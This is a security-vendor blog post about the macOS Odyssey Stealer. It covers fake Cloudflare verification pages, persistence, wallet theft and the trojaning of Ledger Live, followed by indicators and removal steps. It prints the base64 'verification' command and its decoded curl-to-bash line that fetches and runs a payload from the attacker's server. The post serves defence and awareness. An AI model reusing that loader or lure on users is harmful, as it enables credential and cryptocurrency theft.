{"id":31095,"date":"2025-06-11T03:13:58","date_gmt":"2025-06-11T03:13:58","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=31095"},"modified":"2025-06-14T01:50:57","modified_gmt":"2025-06-14T01:50:57","slug":"odyssey-stealer-macos-malware","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/odyssey-stealer-macos-malware\/","title":{"rendered":"Odyssey Stealer: Russian &#8216;Love Trump&#8217; Malware Replaces Ledger Live Crypto Wallet App"},"content":{"rendered":"<p>A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The <strong>Odyssey Stealer<\/strong> represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities.<\/p>\r\n\r\n<p>Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like <code>com.love.russia.plist<\/code> and staging directories named <code>lovemrtrump<\/code> &#8211; suggesting potential connections to Russian threat actors with apparent political motivations. Most concerning is the malware&#8217;s ability to replace legitimate cryptocurrency applications like <a href=\"https:\/\/www.ledger.com\/ledger-live\" target=\"_blank\" rel=\"nofollow noopener\">Ledger Live<\/a> with trojaned versions, compromising hardware wallet security and stealing private keys during transactions.<\/p>\r\n\r\n<h2>The Deception Chain: From Fake Verification to Full Compromise<\/h2>\r\n\r\n<p>The attack begins when users are redirected to seemingly legitimate domains like <code>macosx-apps[.]com<\/code> (macosxappstore[.]com, <a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/url\/appmacosx-com\">appmacosx[.]com<\/a>) displaying convincing Cloudflare-styled verification pages. These pages present users with an &#8220;Unusual Web Traffic Detected&#8221; warning and request manual verification through terminal commands.<\/p>\r\n<figure id=\"attachment_31097\" aria-describedby=\"caption-attachment-31097\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-1024x767.png\" alt=\"macosx-apps - Fake Cloudflare verification page\" width=\"1024\" height=\"767\" class=\"size-large wp-image-31097\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-1024x767.png 1024w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-300x225.png 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-768x575.png 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-1536x1150.png 1536w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-2048x1534.png 2048w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/macosx-apps-860x644.png 860w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-31097\" class=\"wp-caption-text\">macosx-apps &#8211; Fake Cloudflare verification page<\/figcaption><\/figure>\r\n<p>The fake verification page instructs users to:<\/p>\r\n<ol>\r\n    <li>Press <kbd>Command + Space<\/kbd> to open Spotlight<\/li>\r\n    <li>Type &#8220;Terminal&#8221; and press Return<\/li>\r\n    <li>Copy and paste a provided command<\/li>\r\n    <li>Execute the command to &#8220;verify&#8221; their legitimacy<\/li>\r\n<\/ol>\r\n\r\n<p>What appears to be a simple verification text is actually a base64-encoded malicious command: <code>echo \"Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==\" | base64 -d | bash<\/code><\/p>\r\n\r\n<p>When decoded, this reveals the true payload: <code>curl -s hxxp[:]\/\/odyssey1[.]to:3333\/d?u=october | nohup bash &<\/code> &#8211; a command that downloads and executes an AppleScript stealer from the attacker&#8217;s server.<\/p>\r\n\r\n\r\n<div class=\"odyssey-attack-flow\">\r\n    <svg width=\"100%\" height=\"450\" viewBox=\"0 0 800 450\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n        <defs>\r\n            <marker id=\"arrowhead\" markerWidth=\"10\" markerHeight=\"7\" refX=\"9\" refY=\"3.5\" orient=\"auto\">\r\n                <polygon points=\"0 0, 10 3.5, 0 7\" fill=\"#333\" \/>\r\n            <\/marker>\r\n        <\/defs>\r\n        \r\n        <!-- Background -->\r\n        <rect width=\"800\" height=\"450\" fill=\"#f8f9fa\" stroke=\"#ddd\" stroke-width=\"1\"\/>\r\n        \r\n        <!-- Title -->\r\n        <text x=\"400\" y=\"25\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" fill=\"#333\">Odyssey Stealer Attack Flow<\/text>\r\n        \r\n        <!-- Step 1: Initial Redirect -->\r\n        <rect x=\"50\" y=\"60\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#ffebee\" stroke=\"#e57373\" stroke-width=\"2\"\/>\r\n        <text x=\"125\" y=\"80\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">User Redirected<\/text>\r\n        <text x=\"125\" y=\"95\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">to macosx-apps.com, macosxappstore.com, appmacosx.com<\/text>\r\n        <text x=\"125\" y=\"110\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">fake Cloudflare page<\/text>\r\n        \r\n        <!-- Arrow 1 -->\r\n        <line x1=\"200\" y1=\"90\" x2=\"250\" y2=\"90\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 2: Fake Verification -->\r\n        <rect x=\"270\" y=\"60\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#fff3e0\" stroke=\"#ffb74d\" stroke-width=\"2\"\/>\r\n        <text x=\"345\" y=\"80\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Fake Verification<\/text>\r\n        <text x=\"345\" y=\"95\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">&#8220;Unusual Traffic&#8221;<\/text>\r\n        <text x=\"345\" y=\"110\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Terminal Instructions<\/text>\r\n        \r\n        <!-- Arrow 2 -->\r\n        <line x1=\"420\" y1=\"90\" x2=\"470\" y2=\"90\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 3: Base64 Command -->\r\n        <rect x=\"490\" y=\"60\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#e8f5e8\" stroke=\"#81c784\" stroke-width=\"2\"\/>\r\n        <text x=\"565\" y=\"80\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Base64 Command<\/text>\r\n        <text x=\"565\" y=\"95\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">User copies and<\/text>\r\n        <text x=\"565\" y=\"110\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">executes in Terminal<\/text>\r\n        \r\n        <!-- Arrow 3 (down) -->\r\n        <line x1=\"565\" y1=\"120\" x2=\"565\" y2=\"170\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 4: Download Script -->\r\n        <rect x=\"490\" y=\"180\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#e3f2fd\" stroke=\"#64b5f6\" stroke-width=\"2\"\/>\r\n        <text x=\"565\" y=\"200\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Script Download<\/text>\r\n                 <text x=\"565\" y=\"215\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">from odyssey1[.]to:3333<\/text>\r\n        <text x=\"565\" y=\"230\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">AppleScript Payload<\/text>\r\n        \r\n        <!-- Arrow 4 (left) -->\r\n        <line x1=\"490\" y1=\"210\" x2=\"420\" y2=\"210\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 5: Data Collection -->\r\n        <rect x=\"270\" y=\"180\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#f3e5f5\" stroke=\"#ba68c8\" stroke-width=\"2\"\/>\r\n        <text x=\"345\" y=\"200\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Data Collection<\/text>\r\n        <text x=\"345\" y=\"215\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Browser credentials,<\/text>\r\n        <text x=\"345\" y=\"230\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">wallets, system info<\/text>\r\n        \r\n        <!-- Arrow 5 (left) -->\r\n        <line x1=\"270\" y1=\"210\" x2=\"200\" y2=\"210\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 6: Exfiltration -->\r\n        <rect x=\"50\" y=\"180\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#ffebee\" stroke=\"#e57373\" stroke-width=\"2\"\/>\r\n        <text x=\"125\" y=\"200\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Data Exfiltration<\/text>\r\n        <text x=\"125\" y=\"215\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">ZIP upload to<\/text>\r\n                 <text x=\"125\" y=\"230\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">odyssey1[.]to server<\/text>\r\n        \r\n        <!-- Arrow 6 (down) -->\r\n        <line x1=\"125\" y1=\"240\" x2=\"125\" y2=\"290\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 7: Persistence -->\r\n        <rect x=\"50\" y=\"300\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#fce4ec\" stroke=\"#f06292\" stroke-width=\"2\"\/>\r\n        <text x=\"125\" y=\"320\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Persistence Setup<\/text>\r\n        <text x=\"125\" y=\"335\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">LaunchDaemon<\/text>\r\n        <text x=\"125\" y=\"350\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">com.love.russia.plist<\/text>\r\n        \r\n        <!-- Arrow 7 (right) -->\r\n        <line x1=\"200\" y1=\"330\" x2=\"270\" y2=\"330\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 8: App Replacement -->\r\n        <rect x=\"290\" y=\"300\" width=\"160\" height=\"60\" rx=\"8\" fill=\"#fff3e0\" stroke=\"#ffb74d\" stroke-width=\"2\"\/>\r\n        <text x=\"370\" y=\"320\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">App Replacement<\/text>\r\n        <text x=\"370\" y=\"335\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Malicious Ledger Live<\/text>\r\n        <text x=\"370\" y=\"350\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">installation<\/text>\r\n        \r\n        <!-- Arrow 8 (right) -->\r\n        <line x1=\"450\" y1=\"330\" x2=\"520\" y2=\"330\" stroke=\"#333\" stroke-width=\"2\" marker-end=\"url(#arrowhead)\"\/>\r\n        \r\n        <!-- Step 9: Ongoing Control -->\r\n        <rect x=\"540\" y=\"300\" width=\"150\" height=\"60\" rx=\"8\" fill=\"#e8f5e8\" stroke=\"#81c784\" stroke-width=\"2\"\/>\r\n        <text x=\"615\" y=\"320\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#333\">Ongoing Control<\/text>\r\n        <text x=\"615\" y=\"335\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Botnet binary<\/text>\r\n        <text x=\"615\" y=\"350\" text-anchor=\"middle\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">execution loop<\/text>\r\n        \r\n        <!-- Risk indicators -->\r\n        <text x=\"50\" y=\"390\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#d32f2f\">High Risk:<\/text>\r\n        <text x=\"120\" y=\"390\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Complete system compromise, credential theft, crypto wallet access<\/text>\r\n        \r\n        <text x=\"50\" y=\"410\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#f57c00\">Persistence:<\/text>\r\n        <text x=\"125\" y=\"410\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Survives reboots, runs continuously, replaces legitimate applications<\/text>\r\n        \r\n        <text x=\"50\" y=\"430\" font-family=\"Arial, sans-serif\" font-size=\"12\" font-weight=\"bold\" fill=\"#388e3c\">Detection:<\/text>\r\n                 <text x=\"110\" y=\"430\" font-family=\"Arial, sans-serif\" font-size=\"11\" fill=\"#666\">Monitor \/tmp\/lovemrtrump\/, network connections to odyssey1[.]to, LaunchDaemon processes<\/text>\r\n    <\/svg>\r\n<\/div>\r\n\r\n\r\n<h2>Advanced AppleScript Capabilities: Beyond Basic Info-Stealing<\/h2>\r\n\r\n<p>The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. The malware employs randomized function names (like <code>f7220708984353234618<\/code> and <code>v4763105019481279311<\/code>) to evade signature-based detection while systematically harvesting sensitive information.<\/p>\r\n\r\n<h3>Targeted Data Collection<\/h3>\r\n\r\n<p>The stealer focuses on high-value targets across multiple categories:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Browser Credentials:<\/strong> Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords<\/li>\r\n    <li><strong>Cryptocurrency Wallets:<\/strong> Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications<\/li>\r\n    <li><strong>System Information:<\/strong> Collects detailed hardware and software profiles using <code>system_profiler<\/code><\/li>\r\n    <li><strong>Personal Files:<\/strong> Copies documents from Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key<\/li>\r\n    <li><strong>Keychain Access:<\/strong> Steals macOS Keychain databases containing stored passwords and certificates<\/li>\r\n    <li><strong>Apple Notes:<\/strong> Extracts and formats Notes data, potentially revealing personal information and security details<\/li>\r\n<\/ul>\r\n\r\n<h3>Persistence and Privilege Escalation<\/h3>\r\n\r\n<p>The malware establishes multiple persistence mechanisms to maintain long-term access:<\/p>\r\n\r\n<ul>\r\n    <li><strong>LaunchDaemon Installation:<\/strong> Creates <code>\/Library\/LaunchDaemons\/com.love.russia.plist<\/code> to ensure automatic execution at boot<\/li>\r\n    <li><strong>Botnet Binary:<\/strong> Downloads and installs a secondary payload (<code>~\/.init<\/code>) that runs continuously<\/li>\r\n    <li><strong>Social Engineering for Sudo:<\/strong> Prompts users with fake &#8220;Application Helper&#8221; dialogs to obtain administrator passwords<\/li>\r\n    <li><strong>Application Replacement:<\/strong> Can replace legitimate applications like Ledger Live with <a href=\"https:\/\/gridinsoft.com\/online-virus-scanner\/id\/d7023540fd0e682eee3ba63a0b2828cdca60ad9da4ea56a8e41f593c790b0dfb\">malicious versions<\/a><\/li>\r\n<\/ul>\r\n\r\n<h2>Technical Analysis: Obfuscation and Anti-Detection<\/h2>\r\n\r\n<p>The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical <a href=\"https:\/\/gridinsoft.com\/blogs\/lumma-stealer-spreads-via-fake-browser-updates\/\">commodity info-stealers like Lumma<\/a>. Unlike traditional malware that relies on compiled binaries, this threat leverages AppleScript&#8217;s legitimate system access to fly under the radar.<\/p>\r\n\r\n<h3>Key Technical Features<\/h3>\r\n\r\n<table style=\"width: 100%; border-collapse: collapse; margin: 20px 0;\">\r\n    <thead>\r\n        <tr style=\"background-color: #f5f5f5;\">\r\n            <th style=\"border: 1px solid #ddd; padding: 12px; text-align: left; color:black;\">Component<\/th>\r\n            <th style=\"border: 1px solid #ddd; padding: 12px; text-align: left; color:black;\">Function<\/th>\r\n            <th style=\"border: 1px solid #ddd; padding: 12px; text-align: left; color:black;\">Impact<\/th>\r\n        <\/tr>\r\n    <\/thead>\r\n    <tbody>\r\n        <tr>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Variable Obfuscation<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Random 19-digit function\/variable names<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Evades signature detection<\/td>\r\n        <\/tr>\r\n        <tr style=\"background-color: #f9f9f9;\">\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Error Handling<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Comprehensive try-catch blocks<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Prevents crashes, maintains stealth<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>File Exclusions<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Skips .DS_Store, Cache, temp files<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Reduces detection, optimizes exfiltration<\/td>\r\n        <\/tr>\r\n        <tr style=\"background-color: #f9f9f9;\">\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Cleanup Routines<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Removes temporary files post-exfiltration<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Eliminates forensic evidence<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\"><strong>Retry Mechanism<\/strong><\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">10 upload attempts with 60s delays<\/td>\r\n            <td style=\"border: 1px solid #ddd; padding: 12px;\">Ensures successful data theft<\/td>\r\n        <\/tr>\r\n    <\/tbody>\r\n<\/table>\r\n\r\n<h2>Cryptocurrency Focus: The Primary Target<\/h2>\r\n\r\n<p>Like many modern stealers, Odyssey specifically targets cryptocurrency assets with <a href=\"https:\/\/gridinsoft.com\/blogs\/meta-infostealer-malware\/\">precision similar to Meta Infostealer campaigns<\/a>. The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.<\/p>\r\n\r\n<p>High-priority targets include:<\/p>\r\n<ul>\r\n    <li><strong>MetaMask:<\/strong> The most common Ethereum wallet extension<\/li>\r\n    <li><strong>BNB Chain Wallet:<\/strong> Binance Smart Chain access<\/li>\r\n    <li><strong>Hardware Wallet Interfaces:<\/strong> Ledger Live, Trezor Suite<\/li>\r\n    <li><strong>Desktop Wallets:<\/strong> Electrum, Exodus, Atomic Wallet<\/li>\r\n    <li><strong>Exchange Applications:<\/strong> Binance desktop, TonKeeper<\/li>\r\n<\/ul>\r\n\r\n<p>The malware&#8217;s <strong>application replacement capability<\/strong> is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, potentially compromising hardware wallet interactions and stealing private keys during transactions.<\/p>\r\n\r\n<h3>The Ledger Live Trojan: Hardware Wallet Compromise<\/h3>\r\n\r\n<p>One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This supply-chain attack works by:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Application Termination:<\/strong> Killing any running Ledger Live processes<\/li>\r\n    <li><strong>File Replacement:<\/strong> Removing the legitimate <code>\/Applications\/Ledger Live.app<\/code><\/li>\r\n    <li><strong>Malicious Installation:<\/strong> Downloading and installing a trojaned version from <code>hxxp[:]\/\/odyssey1[.]to\/otherassets\/ledger.zip<\/code><\/li>\r\n    <li><strong>Seamless Operation:<\/strong> The fake application appears identical to users while capturing private keys and transaction data<\/li>\r\n<\/ul>\r\n\r\n<p>This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. However, if the companion software is compromised, attackers can potentially intercept private keys, seed phrases, and transaction details even from hardware-secured wallets. The trojaned Ledger Live app could capture sensitive information during device setup, firmware updates, or transaction signing processes.<\/p>\r\n\r\n<h2>Indicators of Compromise (IoCs)<\/h2>\r\n\r\n<h3>Network Indicators<\/h3>\r\n<ul>\r\n    <li><strong>C2 Server:<\/strong> <code>odyssey1[.]to:3333<\/code><\/li>\r\n    <li><strong>Download URL:<\/strong> <code>hxxp[:]\/\/odyssey1[.]to:3333\/d?u=october<\/code><\/li>\r\n    <li><strong>Fake Domain:<\/strong> <code>macosx-apps[.]com<\/code>, <code>macosxappstore[.]com<\/code>, <code>appmacosx[.]com<\/code><\/li>\r\n    <li><strong>Asset Download:<\/strong> <code>hxxp[:]\/\/odyssey1[.]to\/otherassets\/ledger.zip<\/code><\/li>\r\n    <li><strong>Botnet Binary:<\/strong> <code>hxxp[:]\/\/odyssey1[.]to\/otherassets\/botnet<\/code><\/li>\r\n<\/ul>\r\n\r\n<h3>File System Artifacts<\/h3>\r\n<ul>\r\n    <li><strong>Staging Directory:<\/strong> <code>\/tmp\/lovemrtrump\/<\/code><\/li>\r\n    <li><strong>Exfiltration Archive:<\/strong> <code>\/tmp\/out.zip<\/code><\/li>\r\n    <li><strong>Persistence:<\/strong> <code>\/Library\/LaunchDaemons\/com.love.russia.plist<\/code><\/li>\r\n    <li><strong>User Files:<\/strong> <code>~\/.username<\/code>, <code>~\/.pwd<\/code>, <code>~\/.init<\/code>, <code>~\/.start<\/code><\/li>\r\n    <li><strong>Data Collection:<\/strong> <code>\/tmp\/lovemrtrump\/finder\/<\/code>, <code>\/tmp\/lovemrtrump\/deskwallets\/<\/code><\/li>\r\n<\/ul>\r\n\r\n<h2>Detection and Removal Guide<\/h2>\r\n\r\n<p>If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.<\/p>\r\n\r\n<h3>Immediate Detection Steps<\/h3>\r\n\r\n<ol>\r\n    <li><strong>Check for Active Processes:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        ps aux | grep -E &quot;(odyssey|lovemrtrump|\\.init)&quot;\r\n        launchctl list | grep &quot;com.love.russia&quot;\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Inspect File System:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        ls -la \/tmp\/lovemrtrump\/\r\n        ls -la \/Library\/LaunchDaemons\/com.love.russia.plist\r\n        ls -la ~\/.init ~\/.start ~\/.username ~\/.pwd\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Check Network Connections:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        netstat -an | grep &quot;odyssey1&quot;\r\n        lsof -i | grep 3333\r\n        <\/pre>\r\n    <\/li>\r\n<\/ol>\r\n\r\n<h3>Manual Removal Process<\/h3>\r\n\r\n<p><strong>Warning:<\/strong> Manual removal requires administrative privileges and careful execution. For comprehensive cleanup, we recommend using professional security tools.<\/p>\r\n\r\n<ol>\r\n    <li><strong>Stop Malicious Processes:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        sudo launchctl unload \/Library\/LaunchDaemons\/com.love.russia.plist\r\n        sudo pkill -f &quot;\\.init&quot;\r\n        sudo pkill -f &quot;lovemrtrump&quot;\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Remove Persistence Mechanisms:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        sudo rm -f \/Library\/LaunchDaemons\/com.love.russia.plist\r\n        rm -f ~\/.init ~\/.start ~\/.username ~\/.pwd\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Clean Temporary Files:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        sudo rm -rf \/tmp\/lovemrtrump\/\r\n        sudo rm -f \/tmp\/out.zip\r\n        sudo rm -f \/tmp\/ledger.zip\r\n        sudo rm -f \/tmp\/starter\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Verify Application Integrity:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        # Check if Ledger Live was replaced\r\n        ls -la &quot;\/Applications\/Ledger Live.app&quot;\r\n        # Reinstall from official source if suspicious\r\n        <\/pre>\r\n    <\/li>\r\n<\/ol>\r\n\r\n\r\n<h2>Post-Infection Security Measures<\/h2>\r\n\r\n<p>After removing the malware, implement these critical security steps:<\/p>\r\n\r\n<h3>Immediate Actions<\/h3>\r\n<ul>\r\n    <li><strong>Change All Passwords:<\/strong> Update passwords for all accounts, especially financial and cryptocurrency services<\/li>\r\n    <li><strong>Review Financial Accounts:<\/strong> Check bank statements, credit reports, and cryptocurrency wallet balances<\/li>\r\n    <li><strong>Enable 2FA:<\/strong> Activate two-factor authentication on all sensitive accounts<\/li>\r\n    <li><strong>Monitor Credit Reports:<\/strong> Set up fraud alerts with credit bureaus<\/li>\r\n<\/ul>\r\n\r\n<h3>Browser Security<\/h3>\r\n<ul>\r\n    <li><strong>Clear Browser Data:<\/strong> Remove all saved passwords, cookies, and form data<\/li>\r\n    <li><strong>Reinstall Extensions:<\/strong> Remove and reinstall all browser extensions, especially wallet-related ones<\/li>\r\n    <li><strong>Update Browsers:<\/strong> Ensure all browsers are running the latest versions<\/li>\r\n    <li><strong>Review Permissions:<\/strong> Audit browser extension permissions and remove unnecessary access<\/li>\r\n<\/ul>\r\n\r\n<h3>Cryptocurrency Security<\/h3>\r\n<ul>\r\n    <li><strong>Create New Wallets:<\/strong> Generate new wallet addresses and transfer funds from potentially compromised wallets<\/li>\r\n    <li><strong>Hardware Wallet Reset:<\/strong> If using hardware wallets, perform a full reset and restore from backup<\/li>\r\n    <li><strong>Verify Applications:<\/strong> Reinstall all cryptocurrency applications from official sources<\/li>\r\n    <li><strong>Monitor Transactions:<\/strong> Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity<\/li>\r\n<\/ul>\r\n\r\n<h2>The Broader Threat Landscape<\/h2>\r\n\r\n<p>The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. Unlike previous campaigns that relied on social engineering or software vulnerabilities, this threat combines legitimate system tools with deception to bypass traditional security measures.<\/p>\r\n\r\n<p>This attack shares characteristics with other recent campaigns targeting Mac users, including <a href=\"https:\/\/gridinsoft.com\/blogs\/rustbucket-malware-attacks-macos\/\">RustBucket malware<\/a> and various <a href=\"https:\/\/gridinsoft.com\/blogs\/trojan-win64-rustystealer-dks-mtb-removal\/\">cross-platform stealers<\/a>. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users&#8217; trust in system dialogs and terminal commands.<\/p>\r\n\r\n<p>The campaign&#8217;s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, which often lack the same fraud protection mechanisms as traditional financial institutions.<\/p>\r\n\r\n<h3>Geopolitical Implications: The Russia Connection<\/h3>\r\n\r\n<p>The malware&#8217;s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as <code>com.love.russia.plist<\/code> in the system&#8217;s LaunchDaemons directory, while staging stolen data in a folder named <code>lovemrtrump<\/code>. These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users.<\/p>\r\n\r\n<p>The combination of Russian nomenclature and cryptocurrency theft capabilities aligns with patterns observed in other state-sponsored or politically motivated cybercrime operations. The specific targeting of hardware wallet applications like Ledger Live suggests a deep understanding of Western cryptocurrency infrastructure and user behavior patterns.<\/p>\r\n\r\n<h2>Conclusion<\/h2>\r\n\r\n<p>The Odyssey Stealer&#8217;s distinctive characteristics &#8211; from its Russian-themed persistence mechanisms (<code>com.love.russia.plist<\/code>, <code>lovemrtrump<\/code> directories) to its specific targeting of hardware wallet applications like Ledger Live &#8211; suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety.<\/p>\r\n\r\n<p>Mac users must remain vigilant against these evolving threats, particularly those involving terminal commands or system-level access requests. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.<\/p>\r\n\r\n<p>As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation 